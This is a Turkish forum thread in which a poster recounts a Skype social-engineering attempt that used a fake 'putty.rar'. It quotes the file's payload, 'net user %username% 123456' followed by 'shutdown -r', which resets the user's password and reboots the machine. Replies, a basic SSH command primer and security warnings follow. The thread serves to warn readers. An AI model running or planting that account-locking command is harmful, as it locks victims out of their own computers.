Bir Hack Denemesi Hack Yiyip Milyarlar Kaybetmemek İçin Okuyun Derim

Pars Yazılım

Yasaklanmış
Merhaba beyler biraz önce bir hacker tarafından hacklenme girişimine uğradım ben belki bilirsiniz eski hacker olduğum için yemedim tabi ama eskilerden az buz bişey değildi arkadaşınki güzel bir yöntemdi ve bunu teknolijiyi çok iyi bilen bir kişi bile yiyebilirdi arkadaşın biri ekledi skype adresimden konuşmayı sizinle paylaşayım.

Monastery:sa
Ben:as
Monastery:putty anlar mısın hocam?
Ben:Birazda nerden tanışıyoruz noluyo direk mevzuya daldın.
Monastery:ben bi forumdan gördüm
Monastery:putty.rar adlı bir dosya attı dosyayı aldım ve inceledim

Attıgı dosyanın putty erişimi olmadıgını anladım ve açmadan konuşmaya devam ettim.

Monastery:ip : 172.228.64.75
Monastery : k.adı root
Monastery :şifre purrt555.
Ben:1 Dakka noluyoruz hocam hangi forum benden ne istiyorsun ?
Monastery :bende girmiyor putty
Ben:Telnet portları açık mı ? hangi işletim sistemi kullanıyorsun ?
Monastery :sizde bağlandımı hocam ? W7
Ben:Hayır bağlanmaz şuan oturduğum bilgisayar olduğu için güvenlik duvarları v.b yüzünden her türlü dış bağlantı engelli Win7 güvenlik duvarını kapatmanızı portlarınızı gözden geçirmenizi öneririm hangi forumdan gördüğünü hala söylemediniz bu arada
Monastery : bi denermisin
Monastery : ya
Monastery : merak ettim
Ben:Yok merak etmeyin :D

Sonra dosyayı rardan çıkarıp inceledim.
net user %username% 123456
shutdown -r
kodunu içeriyordu bunu açtığınızda ne olur peki bu kod ne anlama gelir.
Cmd'yi açıp kullanıcınızı şifreler verilen şifreyle ve bilgisayarı hiç birşey sormadan kapatır.
Arkadaş sanırım acemi biriydiki zor bir şifre koymamıştı koysaydı ne olurdu bilgisayarı açardınız şifreli odluğunu görürdünüz dener dener giremezdiniz sonra format atmak zorunda kalırdınız tüm dosyalarınız v.b giderdi arkadaş eğer profosyonel biriyse siz bu şifreyi bulup girdiğinizde Linux yardımıyla bilgisayarınıza girerdi büyük ihtimal zaten skype'de konuşurken ip adresinizi tespit etmişti kullanıcı adı şifre v.b bilgileride biliyordu herşey elindeydi girerdi tüm dosyalarınıza erişirdi isterse bütün dosyaları kendi bilgisayarına kopyalar veya masaüstünüze birşeyler yerleştirirdi bu yöntemle size virüs yedirip bilgisayarında tam yetkiye sahip olurdu.Ondan sonra size ne yapacağı kardışıdaki Hackerın vicdanına kalırdı.

Ben eski hacker olduğum için hiç bir hasar almadan bu işten kurtuldum sizede bilgilendirmek için bu yazıyı yazdım kimseden bir sosmal medya sisteminde dosya alıp vermeyin en yakınınız biri bile olsa çünkü hacker sizi avlamak için daha önce arkadaşınızı avlamış olabilir.Skype facebook gibi yerlerden tanımadıgınız kişileri eklemeyin eklemenizle bile hacker sizinle ilgili bir çok bilgiye sahip olabilir.

Okuduğunuz için teşekkürler iyi günler dilerim.

Dipnot

SSH Putty hakkında bilgi:
SSH, Telnet ve rlogin gibi ağ üzerindeki başka bir sunucuya uzakta bulunan bir başka makineden bağlantı sağlayan bir protokoldür.

SSH açık haliyle “Secure Shell” yani güvenli kabuk anlamına gelir. Telnet ve rlogin kullanıcı şifreleri dahil tüm iletişim açık yani şifrelenmeden gerçekleştirilirken, SSH güvensiz makineler arasındaki iletişimi güçlü bir kripto yöntemiyle şifreler.

SSH ile bağlantının gerçekleştirilebilmesi için Telnet bölümünde de anlattığımız üzere bağlanılmak istenen sunucu makinede bir kullanıcı hesabının ve kullanıcı şifresinin bulunması gereklidir.

Bunların dışında birde SSH istemci programlarından birine ihtiyacımız olacaktır. SSH ile bir bilgisayara bağlanabilmek için kullanıcı, öncelikle kimliğini ispatlayabilmelidir.

Bağlantıdan sonra kullanacağınız bazı komutlar.

ls
Kullanımı: ls
Açıklaması: Dizindeki dosya veya klasörleri görmenizi sağlar.

cd
Kullanımı: cd dosya
Açıklaması: her hangi bir klasöre girmeyi sağlar

cd ..
Kullanımı: cd ..
Açıklaması: Bir üst dizine geçmenizi sağlar.

pico
Kullanımı: pico dosya.conf , pico dosya.txt
Açıklaması: Her hangi bir dosyanın içeriğini görmeye yarar. İçeriğini açtığınız dosya üzerinde değişiklik yapabilirsiniz. pico kurulu olmayan server'larda nano kullanılır. Dosya içinde her hangi bir değişiklik yaptığınızda ctrl+x e basıp "y" tuşuna basarak enterlamanız yeterli olur. "y" değişiklikleri kaydet, "n" değişiklikleri kaydetme.

cp
Kullanımı: cp kopyalanacak-dosya kopyalanacak-dizin
Açıklaması: her hangi bir dizin veya dosya kopyalama olanağı sağlar.

mkdir
Kullanımı: mkdir klasör-adı
Açıklaması: Klasör (dizin) oluşturmanızı sağlar.

rmdir
Kullanımı: rmdir klasör-adı
Açıklaması: Klasör (dizin) silmenizi sağlar.

rm -r
Kullanımı: rm -r dosya.txt
Açıklaması: dosya silmek için kullanılır.

rm -Rf
Kullanımı: rm -Rf dizin
Açıklaması: Dizindeki tüm dosyaları siler.

Kullanımı: top
Açıklaması: Sistem kullanımını gösterir. CPU ram vs. (Rootlar kullanabilir.)

Dosya Sıkıştırmak
Kullanımı: tar cvzf dosyam.tar.gz sıkıştırılacak-dosya
Açıklaması: Komut dosya sıkıştırmaya yarar. bu formatta sıkıştıracağınız dosyanızın adı dosyam.tar.gz olacaktır.

Sıkıştırılan Dosyayı Açmak
Kullanımı: tar -zxvf dosyam.tar.gz
Açıklaması: Bu şekilde sıkıştırmış olduğunuz dosyanızı açabilirsiniz.

Unzip
Kullanımı: unzip dosya.zip
Açıklaması: Zip ile sıkıştırılmış dosyalarınızı açmanızı sağlar.

wget
Kullanımı: wget http://www.site.com/dosya.zip
Açıklaması: Hızlı bir şekilde hostunuza dosya aktarmanızı sağlar.

whois
Kullanımı: whois domain.com
Açıklaması: Her hangi bir site adresi kullanmadan bu program ile çok kolay ve hızlı bir şekilde domain'lere whois çekebilirsiniz.

Geçmiş olsun..Bilgilendirme için Teşekkürler
hocam şu ünleme de br çözüm bulun :D

Okumadım, Herkırlar P.M me pls.
:cool:

hmm iyiymiş geçmiş olsun

Geçmiş olsun..Bilgilendirme için Teşekkürler
hocam şu ünleme de br çözüm bulun :D

Şuan youtubeyle ilgilenmeye zaman bulamıyorum bir proje üstündeyim ve 1 hafta sonra teslim yapıcam lisem nedeniyle biraz zor oluyor çalışmak zaten kendime bile zaman bulamıyorum ama çalışmam lazım işin ucundan 2.600 TL var.

---------- Mesaj saat 01:03:55 civarında birleştirildi. ---------- İlk mesaj saat 01:01:30 civarında gönderildi. ----------

Okumadım, Herkırlar P.M me pls.

Dalga geçmeminizi öneririm bu adamların neler yapabildiğiniz biraz okumanızı öneririm eğer youtubedan para kazanıyorsanız bir akşam bilgisayarınza girip hayatınızla oynayabilirler bütün dosyalarını çekip bütün gmail hesaplarını çalarlar kanallarınızı botlarınızı v.b sabah bir kalkarsınız ve buff hiç birşey yok ne hesaplar ne para o kadar emek ne oldu bir günde 0 oldu böyle metinlerle dalga geçmemeniz nedeniyle.

---------- Mesaj saat 01:04:19 civarında birleştirildi. ---------- İlk mesaj saat 01:03:55 civarında gönderildi. ----------

hmm iyiymiş geçmiş olsun

Teşekkür ederim başınıza gelmemesi dileğiyle

---------- Mesaj saat 01:04:50 civarında birleştirildi. ---------- İlk mesaj saat 01:04:19 civarında gönderildi. ----------

Kendimi yolculuktaymış gibi hissettim hostes verdiği bilgilerden sonra böyle şeyler diyo :D :D

Geçmiş olsun.

Teşekkür ederim biraz alışkanlık oldu metinlerimden sonra yazmak.

Dalga geçmeminizi öneririm bu adamların neler yapabildiğiniz biraz okumanızı öneririm eğer youtubedan para kazanıyorsanız bir akşam bilgisayarınza girip hayatınızla oynayabilirler bütün dosyalarını çekip bütün gmail hesaplarını çalarlar kanallarınızı botlarınızı v.b sabah bir kalkarsınız ve buff hiç birşey yok ne hesaplar ne para o kadar emek ne oldu bir günde 0 oldu böyle metinlerle dalga geçmeniz nedeniyle.

Birazdan yatıp uyucam bakalım dediklerin rüyamda gerçekleşecekmi.
:D

Geçmiş olsun hocam.

Teşekkürler.

---------- Mesaj saat 01:17:16 civarında birleştirildi. ---------- İlk mesaj saat 01:15:29 civarında gönderildi. ----------

Birazdan yatıp uyucam bakalım dediklerin rüyamda gerçekleşecekmi.

:D Gerçekten çok komik dimi isterseniz aylık ne kadar kazandığınızı yazında bir kaç hacker forumunda paylaşayım belki ilgi duyan bir arkadaş olur.

:D Gerçekten çok komik dimi isterseniz aylık ne kadar kazandığınızı yazında bir kaç hacker forumunda paylaşayım belki ilgi duyan bir arkadaş olur.

Aylık 500tl kazancım var Yt'den HEYKIR arkadaşlarının işini görür mü?

Hey Allahım ya bana geyik yapıyorsun diyene bak.
Dur sen söylemeden ben bir yaş tahmininde bulunucam.
Yaşın 20'yi geçmiyordur.

İstediğin kişiye istediğin forumda Benden Bahset Fark Yapmaz.

Edit : Yatıyorum senle daha fazla geyik yapamıcam.
Ama yazdıklarım geçerli.

Geçmiş olsun. Bende teknoloji uzmanıyım (: aklım yerinde olduğu sürece asla yemem. Siz eski hackerlardan kimlerdensiniz hocam ? Cw de üyeliğiniz mevcut mudur ?

Hala böyle dosyaları millete yedirmeye çalışan lamer varmıymış yahu. Yıl olmuş 2014 ve hala 10 senelik taktikler.

Geçmiş olsun. Bende teknoloji uzmanıyım (: aklım yerinde olduğu sürece asla yemem. Siz eski hackerlardan kimlerdensiniz hocam ? Cw de üyeliğiniz mevcut mudur ?

Free takılıyordum biraz her türlü site ve grupla çalışmışlığım dostluğum vardır ama fazla takıldığım yoktu öyle ama cyber warrior'dan cwkaan sonra cwdeveloper'ı filan tanırım cwdeveloper'la hala görüşüyorum skypeden , birlikte bir kaç proje geliştirmişliğimiz vardır.

---------- Mesaj saat 01:31:18 civarında birleştirildi. ---------- İlk mesaj saat 01:30:18 civarında gönderildi. ----------

Hala böyle dosyaları millete yedirmeye çalışan lamer varmıymış yahu. Yıl olmuş 2014 ve hala 10 senelik taktikler.

Ee dökümanlar 10 senelikte 10'dan yenilerde bilgi bulamayınca bunları deniyor ama adamdaki S.m güzeldi gerçekten :D

---------- Mesaj saat 01:32:23 civarında birleştirildi. ---------- İlk mesaj saat 01:31:18 civarında gönderildi. ----------

Zaten iş yapan eskiler fazla s.m ile ilgileri yok ama zaten bizim gibi değersiz kişilerle uğraşmıyorlar hedefleri şirketler v.b

Bilgiler için teşekkürler. Dikkat etmek lazım. Dalga geçen arkadaşlar birgün böyle birşeyle hack yerlerse o zaman ciddiyetini anlarlar. Normal dosyaya özellikle .exe ye kimse tıklamaz ama putty vs giriyor işin içine şahsen bu şahıs beni eklese biraz muhabbet kursa kaynaşsa ve puttyi verse bi bahaneyle ben girerdim putty den böyle birşey olacağını hiç düşünmezdim tekrar teşekkürler.

Kişiselleştirme

Tema editörü

Ayarlar Renkler

• Mobil kullanıcılar bu fonksiyonları kullanamaz.

Alternatif header

Farklı bir görünüm için alternatif header yapısını kolayca seçebilirsiniz.

Görünüm Modu Seçimi

Tam ekran ve dar ekran modları arasında geçiş yapın.

Izgara Görünümü

Izgara modu ile içerikleri kolayca inceleyin ve düzenli bir görünüm elde edin.

Resimli Izgara Modu

Arka plan görselleriyle içeriğinizi düzenli ve görsel olarak zengin bir şekilde görüntüleyin.

Yan Paneli Kapat

Yan paneli gizleyerek daha geniş bir çalışma alanı oluşturun.

Sabit Yan Panel

Yan paneli sabitleyerek sürekli erişim sağlayın ve içeriğinizi kolayca yönetin.

Box görünüm

Temanızın yanlarına box tarzı bir çerçeve ekleyebilir veya mevcut çerçeveyi kaldırabilirsiniz. 1300px üstü çözünürler için geçerlidir.

Köşe Yuvarlama Kontrolü

Köşe yuvarlama efektini açıp kapatarak görünümü dilediğiniz gibi özelleştirin.

• Renginizi seçin

Tarzınızı yansıtan rengi belirleyin ve estetik uyumu sağlayın.

Geri